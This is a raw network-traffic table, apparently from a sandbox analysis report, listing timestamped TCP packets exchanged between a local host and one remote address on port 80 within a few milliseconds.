Nov 24, 2022 12:20:03.615634918 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615638018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615663052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615664005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615689039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615691900 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615714073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615722895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615741968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615766048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615788937 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615792036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615808964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615817070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615843058 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615843058 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615868092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615874052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615892887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615895987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615920067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615947008 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615947008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615947008 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615966082 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615976095 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615984917 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616003036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616015911 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616031885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616043091 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616059065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616080999 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616085052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616111040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616132975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616133928 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616136074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616153002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616162062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616178989 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616188049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616198063 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616214037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616228104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616241932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616251945 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616266966 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616283894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616293907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616319895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616321087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616345882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616367102 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616372108 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616396904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616403103 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616420984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616435051 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616446972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616470098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616472960 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616498947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616501093 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616522074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616524935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616542101 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616552114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616564989 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616580963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616590977 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616607904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616621971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616636038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616651058 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616662979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616678953 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616688967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616698980 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616717100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616743088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616761923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616767883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616794109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616812944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616817951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616837978 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616846085 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616871119 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616873026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616892099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616909027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616920948 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616938114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616950989 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.616966009 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.616993904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617014885 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617019892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617048025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617079973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617105007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617129087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617130995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617157936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617158890 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617187977 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617199898 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617217064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617240906 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617266893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617268085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617285967 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617292881 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617321014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617322922 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617337942 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617347956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617361069 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617377996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617405891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617410898 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617434025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617436886 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617459059 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617461920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617475033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617491961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617513895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617520094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617542982 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617547989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617559910 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617575884 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617590904 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617604971 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617619038 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617633104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617647886 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617660046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617677927 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617686987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617707014 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617713928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617728949 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617739916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617769003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617786884 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617795944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617829084 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617844105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617856026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617873907 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617881060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617907047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617933989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617938995 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617959976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617963076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.617986917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.617994070 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618015051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618041039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618063927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618066072 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618088961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618089914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618105888 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618117094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618139982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618165016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618179083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618191004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618206024 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618218899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618240118 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618244886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618264914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618269920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618298054 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618299961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618319035 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618326902 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618345022 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618352890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618371964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618377924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618391037 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618403912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618422985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618432999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618443966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618462086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618486881 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618505955 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618508101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618534088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618535042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618558884 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618566990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618586063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618592024 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618607044 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618613005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618634939 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618638992 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618649006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618664980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618688107 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618691921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618720055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618740082 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618746042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618771076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618777990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618798018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618810892 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618824005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618846893 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618851900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618891001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618891001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618908882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618918896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618932009 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618948936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618973017 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.618973970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.618998051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619004011 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619024038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619025946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619046926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619050026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619076014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619081974 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619103909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619107962 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619126081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619128942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619148016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619153023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619172096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619179010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619204044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619210958 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619230032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619242907 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619256020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619277000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619282961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619307995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619312048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619332075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619338989 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619354010 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619359016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619385004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619405985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619410038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619432926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619436026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619462967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619465113 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619483948 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619488955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619505882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619515896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619525909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619544029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619565964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619568110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619589090 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619594097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619604111 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619622946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619651079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619674921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619680882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619699955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619713068 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619724989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619743109 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619752884 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619775057 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619777918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619800091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619818926 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619839907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619858980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619875908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619884968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619910002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619910955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619939089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619959116 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.619962931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.619987965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620013952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620018005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620032072 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620043039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620049953 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620069027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620080948 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620096922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620104074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620122910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620143890 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620147943 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620172024 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620174885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620191097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620203972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620217085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620232105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620256901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620279074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620284081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620306969 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620309114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620333910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620337963 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620357990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620361090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620384932 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620385885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620409012 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620410919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620430946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620436907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620454073 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620464087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620486975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620488882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620505095 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620515108 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620527983 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.620543003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.620549917 CET	49710	80	192.168.2.3	66.235.200.147
